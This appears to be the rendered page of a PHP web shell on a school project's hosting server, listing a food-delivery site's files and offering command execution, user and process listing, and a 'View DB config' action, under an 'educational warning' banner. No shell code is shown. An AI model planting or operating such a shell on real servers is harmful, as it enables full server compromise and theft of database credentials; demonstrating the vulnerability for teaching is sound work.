🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/583521.klas4s23.mid-ica.nl/public_html/Food-Delivery/php

📁 ..
📄 about.php [view]
📄 account.php [view]
📄 admin.php [view]
📄 adminlogin.php [view]
📄 adminlogout.php [view]
📄 afhalenpage.php [view]
📄 ban_user.php [view]
📄 banned.php [view]
📄 cart.php [view]
📄 contact.php [view]
📄 create_admin.php [view]
📄 delete_korting.php [view]
📄 delete_product.php [view]
📄 delete_user.php [view]
📄 index.php [view]
📄 korting.php [view]
📄 login.php [view]
📄 logout.php [view]
📄 menu.php [view]
📄 order.php [view]
📄 orders.php [view]
📄 process_form.php [view]
📄 register.php [view]
📄 school_server_db.sql [view]
📄 test.php [view]
📄 unban_user.php [view]
📄 users.php [view]

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!